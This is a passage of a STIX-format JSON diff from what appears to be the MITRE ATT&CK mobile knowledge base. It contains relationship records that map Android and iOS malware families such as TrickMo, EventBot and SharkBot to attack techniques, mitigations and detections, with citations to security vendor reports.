Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:31:11.269Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) has collected SMS messages.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4f812a57-efdc-463b-bf37-baa4bca7502b", + "created": "2020-05-04T14:22:20.348Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecurityIntelligence TrickMo", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. 
Retrieved April 24, 2020.", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:35:00.081Z", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) can uninstall itself from a device on command by abusing the accessibility service.(Citation: SecurityIntelligence TrickMo) ", + "relationship_type": "uses", + "source_ref": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "target_ref": "attack-pattern--0cdd66ad-26ac-4338-a764-4972a1e17ee3", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ad723fb0-7439-407e-9bf5-1cb3fd7df8aa", + "created": "2023-02-06T19:05:28.288Z", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. 
Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-06T19:05:28.288Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can collect files from or inspect the device’s filesystem.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--395cb6b2-0848-43c7-ac4a-617e103fb66a", + "created": "2020-11-20T16:37:28.591Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Symantec GoldenCup", + "description": "R. Iarchy, E. Rynkowski. (2018, July 5). GoldenCup: New Cyber Threat Targeting World Cup Fans. 
Retrieved October 29, 2020.", + "url": "https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:02:09.253Z", + "description": "[Golden Cup](https://attack.mitre.org/software/S0535) has communicated with the C2 using MQTT and HTTP.(Citation: Symantec GoldenCup)", + "relationship_type": "uses", + "source_ref": "malware--f3975cc0-72bc-4308-836e-ac701b83860e", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--13078a96-2cda-4d0b-99f8-693a65a4b63d", + "created": "2020-12-18T20:14:47.297Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "WhiteOps TERRACOTTA", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) has generated non-human advertising impressions.(Citation: WhiteOps TERRACOTTA)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--56551987-326a-46ad-a34a-59bb7ab793a9", + "created": "2020-12-14T14:52:03.266Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Sophos Red Alert 2.0", + "description": "J. Chandraiah. (2018, July 23). Red Alert 2.0: Android Trojan targets security-seekers. 
Retrieved December 14, 2020.", + "url": "https://news.sophos.com/en-us/2018/07/23/red-alert-2-0-android-trojan-targets-security-seekers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:24:07.828Z", + "description": "[Red Alert 2.0](https://attack.mitre.org/software/S0539) can request device administrator permissions.(Citation: Sophos Red Alert 2.0)", + "relationship_type": "uses", + "source_ref": "malware--6e282bbf-5f32-476a-b879-ba77eec463c8", + "target_ref": "attack-pattern--9c049d7b-c92a-4733-9381-27e2bd2ccadc", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ddb5ba6d-0549-44bd-a669-972bd48e927b", + "created": "2020-07-15T20:20:59.307Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Mandrake](https://attack.mitre.org/software/S0485) has used domain generation algorithms.(Citation: Bitdefender Mandrake)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--fd211238-f767-4599-8c0d-9dca36624626", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5706742b-733d-44e9-a032-62b81ba05bcf", + "created": "2020-06-02T14:32:31.897Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Google Project Zero Insomnia", + "description": "I. Beer. (2019, August 29). Implant Teardown. Retrieved June 2, 2020.", + "url": "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:26:52.491Z", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) can retrieve SMS messages and iMessages.(Citation: Google Project Zero Insomnia)", + "relationship_type": "uses", + "source_ref": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b81ba10a-73c2-4616-a8bc-eeb422e1c5ea", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.0", + 
"external_references": [ + { + "source_name": "HackerNews-Allwinner", + "url": "https://thehackernews.com/2016/05/android-kernal-exploit.html", + "description": "Mohit Kumar. (2016, May 11). Kernel Backdoor found in Gadgets Powered by Popular Chinese ARM Maker. Retrieved September 18, 2018." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "A Linux kernel distributed by [Allwinner](https://attack.mitre.org/software/S0319) reportedly contained an simple backdoor that could be used to obtain root access. It was believed to have been left in the kernel by mistake by the authors.(Citation: HackerNews-Allwinner)", + "modified": "2022-04-15T15:16:35.892Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--08784a9d-09e9-4dce-a839-9612398214e8", + "target_ref": "attack-pattern--9558a84e-2d5e-4872-918e-d847494a8ffc", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--dc6514a0-2e9c-4f29-8c15-99e6d382e357", + "created": "2019-07-10T15:25:57.572Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Dark Caracal Jan 2018", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. 
Retrieved April 11, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:31:46.913Z", + "description": "[FinFisher](https://attack.mitre.org/software/S0182) captures and exfiltrates SMS messages.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--a5528622-3a8a-4633-86ce-8cdaf8423858", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--79f04c05-8299-4e5e-b4c1-3f82637fa47a", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2018-10-17T00:14:20.652Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--f9e4f526-ac9d-4df5-8949-833a82a1d2df", + "target_ref": "attack-pattern--0d95940f-9583-4e0f-824c-a42c1be47fad", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--bd99b570-5966-4337-8ab4-2d6f4afd0f7f", + "type": "relationship", + "created": "2019-09-04T15:38:56.799Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CyberMerchants-FlexiSpy", + "url": "http://www.cybermerchantsofdeath.com/blog/2017/04/22/FlexiSpy.html", + "description": "Actis B. (2017, April 22). FlexSpy Application Analysis. Retrieved September 4, 2019." 
+ } + ], + "modified": "2019-09-10T14:59:26.138Z", + "description": "[FlexiSpy](https://attack.mitre.org/software/S0408) can record video.(Citation: CyberMerchants-FlexiSpy)", + "relationship_type": "uses", + "source_ref": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b5590b50-0aaa-4f43-9b29-f17ee717b551", + "type": "relationship", + "created": "2021-02-08T16:36:20.698Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "BlackBerry Bahamut", + "url": "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf", + "description": "The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021." 
+ } + ], + "modified": "2021-05-24T13:16:56.412Z", + "description": "[Windshift](https://attack.mitre.org/groups/G0112) has included location tracking capabilities in the malicious apps deployed as part of Operation BULL and Operation ROCK.(Citation: BlackBerry Bahamut)", + "relationship_type": "uses", + "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b8606318-8c12-4381-ba33-5b2321772ea0", + "created": "2022-03-30T20:31:57.183Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be advised to be extra scrutinous of applications that request location or sensitive phone information permissions, and to deny any permissions requests for applications they do not recognize.", + "modified": "2022-03-30T20:31:57.183Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--498e7b81-238d-404c-aa5e-332904d63286", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--df036f55-f749-4dad-9473-d69535e0f98d", + "created": "2020-06-26T14:55:13.385Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Cybereason EventBot", + "url": "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born", + "description": "D. Frank, L. Rochberger, Y. Rimmer, A. Dahan. 
(2020, April 30). EventBot: A New Mobile Banking Trojan is Born. Retrieved June 26, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[EventBot](https://attack.mitre.org/software/S0478) can abuse Android’s accessibility service to record the screen PIN.(Citation: Cybereason EventBot)", + "modified": "2022-04-15T17:39:39.931Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--aecc0097-c9f8-4786-9b39-e891ff173f54", + "target_ref": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f5e9afdc-1aeb-472f-b267-46e7978f9d78", + "created": "2023-03-20T18:54:09.674Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:54:09.674Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4", + "target_ref": "attack-pattern--233fe2c0-cb41-4765-b454-e0087597fbce", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--8ec03f4c-5ed8-4c25-956c-3ee6c777a5cc", + "type": "relationship", + "created": "2019-09-23T13:36:08.441Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. 
Retrieved September 23, 2019.", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/", + "source_name": "securelist rotexy 2018" + } + ], + "modified": "2019-09-23T13:36:08.441Z", + "description": "[Rotexy](https://attack.mitre.org/software/S0411) retrieves a list of installed applications and sends it to the command and control server.(Citation: securelist rotexy 2018)", + "relationship_type": "uses", + "source_ref": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--8f88d438-3150-4317-b1fe-b14f13c15ac5", + "type": "relationship", + "created": "2019-09-03T19:45:48.501Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019." 
+ } + ], + "modified": "2019-10-14T16:47:53.197Z", + "description": " [Exodus](https://attack.mitre.org/software/S0405) Two can record audio from the compromised device's microphone and can record call audio in 3GP format.(Citation: SWB Exodus March 2019) ", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1bcd4b25-a1e0-4511-b0bf-3923a1e74c4e", + "created": "2020-12-31T18:25:05.165Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "CYBERWARCON CHEMISTGAMES", + "url": "https://www.youtube.com/watch?v=xoNSbm1aX_w", + "description": "B. Leonard, N. Mehta. (2019, November 21). The Secret Life of Sandworms. Retrieved December 31, 2020." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[CHEMISTGAMES](https://attack.mitre.org/software/S0555) has used HTTPS for C2 communication.(Citation: CYBERWARCON CHEMISTGAMES) ", + "modified": "2022-04-18T16:00:57.320Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--a0d774e4-bafc-4292-8651-3ec899391341", + "target_ref": "attack-pattern--16d73b64-5681-4ea0-9af4-4ad86f7c96e8", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b2896068-4d54-41e1-b0f2-db9385615112", + "type": "relationship", + "created": "2021-01-05T20:16:20.426Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021." 
+ } + ], + "modified": "2021-01-05T20:16:20.426Z", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) has shown a persistent notification to maintain access to device sensors.(Citation: Zscaler TikTok Spyware)", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--648f8051-1a35-46d3-b1d8-3a3f5cf2cc8e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3857f790-6ea1-4f37-8d90-90904f175d63", + "created": "2023-01-18T21:37:55.717Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store. Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:48:17.771Z", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) has C2 commands that can uninstall the app from the infected device.(Citation: nccgroup_sharkbot_0322)", + "relationship_type": "uses", + "source_ref": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "target_ref": "attack-pattern--0cdd66ad-26ac-4338-a764-4972a1e17ee3", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--53364899-1ea5-47fa-afde-c210aed64120", + "type": 
"relationship", + "created": "2019-07-10T15:47:19.659Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "source_name": "Lookout Dark Caracal Jan 2018" + } + ], + "modified": "2019-07-16T15:35:21.086Z", + "description": "(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "intrusion-set--8a831aaa-f3e0-47a3-bed8-a9ced744dd12", + "target_ref": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--049a5149-00c9-492a-8ffb-463f3d0cd910", + "created": "2022-03-30T20:13:28.442Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Android 10 Limitations to Hiding App Icons", + "url": "https://source.android.com/setup/start/android-10-release#limitations_to_hiding_app_icons", + "description": "Android. (n.d.). Android 10 Release Notes: Limitations to hiding app icons. Retrieved March 30, 2022." + }, + { + "source_name": "LauncherApps getActivityList", + "url": "https://developer.android.com/reference/kotlin/android/content/pm/LauncherApps#getactivitylist", + "description": "Android. (n.d.). LauncherApps: getActivityList. Retrieved March 30, 2022." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android 10 introduced changes to prevent malicious applications from fully suppressing their icon in the launcher.(Citation: Android 10 Limitations to Hiding App Icons)(Citation: LauncherApps getActivityList)", + "modified": "2022-05-20T17:16:08.998Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--cea30219-a255-43ae-b731-9512c5044523", + "created": "2022-04-18T19:46:02.547Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-18T19:46:02.547Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--b3c2e5de-0941-4b57-ba61-af029eb5517a", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f709a4a5-2d7f-4fa8-bad8-a536fd3cc7fc", + "created": "2022-04-01T13:18:40.460Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Contact list access is an uncommonly needed permission, so users should be instructed to use extra scrutiny when granting access to their contact list. 
", + "modified": "2022-04-01T13:18:40.460Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--51b0a4fb-a308-4694-9437-95702a50ebd5", + "type": "relationship", + "created": "2020-09-11T16:22:03.231Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout ViperRAT", + "url": "https://blog.lookout.com/viperrat-mobile-apt", + "description": "M. Flossman. (2017, February 16). ViperRAT: The mobile APT targeting the Israeli Defense Force that should be on your radar. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-11T16:22:03.231Z", + "description": "[ViperRAT](https://attack.mitre.org/software/S0506) can take photos with the device camera.(Citation: Lookout ViperRAT)", + "relationship_type": "uses", + "source_ref": "malware--f666e17c-b290-43b3-8947-b96bd5148fbb", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--60e2ebd0-90dc-4131-ba4f-adc9b49ec113", + "created": "2020-06-26T15:32:25.032Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Threat Fabric Cerberus", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html", + "description": "Threat Fabric. (2019, August). 
